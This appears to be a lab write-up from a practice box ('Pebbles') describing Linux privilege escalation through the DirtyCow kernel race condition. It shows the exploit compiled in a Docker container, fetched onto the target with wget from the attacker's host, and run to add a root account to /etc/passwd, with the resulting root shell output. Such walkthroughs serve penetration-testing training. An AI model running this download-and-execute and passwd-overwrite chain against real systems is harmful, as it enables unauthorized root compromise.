CVE-2016-5195 (DirtyCow)
PEAS has identified that the target system is vulnerable to CVE-2016-5195 (DirtyCow)
/Practice/Pebbles/5-Privilege_Escalation/attachments/{3CEDA56B-F4DD-4ED7-BDB2-963249D767F5}.png)
A vulnerability was found in Linux Kernel up to 4.2.3 (Operating System). It has been declared as critical. Affected by this vulnerability is an unknown code of the component Kernel Memory Subsystem. The manipulation with an unknown input leads to a race condition vulnerability (Dirty COW). The CWE definition for the vulnerability is CWE-362. The product contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently. As an impact it is known to affect confidentiality, integrity, and availability.
Exploit
/Practice/Pebbles/5-Privilege_Escalation/attachments/{10CFD01C-E343-41D8-A760-51ACC5C16D1C}.png)
Exploit located online
www-data@pebbles:/$ gcc
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
www-data@pebbles:/$ cc
The program 'cc' can be found in the following packages:
* gcc
* clang
* tcc
Ask your administrator to install one of themCompiler is not available locally. Opting out to remote compilation.
Docker Exploit Development
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ docker run -it --entrypoint "/bin/bash" -v ./:/root/host --name pebbles ubuntu:16.04
root@ed4ffa517958:/# cd root; apt update -y; apt install git make nano gcc gcc-multilib -y
root@ed4ffa517958:~# ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11.3) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.Setting up the environment
root@ed4ffa517958:~# nano dirty.c
root@ed4ffa517958:~# gcc -pthread dirty.c -o dirty -lcrypt
root@ed4ffa517958:~# cp dirty host/Compiling and packaging the exploit
Exploitation
root@pebbles:/var/tmp# wget -q http://192.168.45.192/dirty ; chmod 755 ./dirtyDelivery complete
www-data@pebbles:/var/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: Qwer1234
Complete line:
firefart:fijoB5ycaIoR6:0:0:pwned:/root:/bin/bash
mmap: 7f0adf049000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'Qwer1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'Qwer1234'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwdExploit successful
www-data@pebbles:/var/tmp$ su firefart
Password: Qwer1234
firefart@pebbles:/var/tmp# whoami
firefart
firefart@pebbles:/var/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@pebbles:/var/tmp# hostname
pebbles
firefart@pebbles:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:50:88 brd ff:ff:ff:ff:ff:ff
inet 192.168.209.52/24 brd 192.168.209.255 scope global ens160
valid_lft forever preferred_lft forever
System level compromise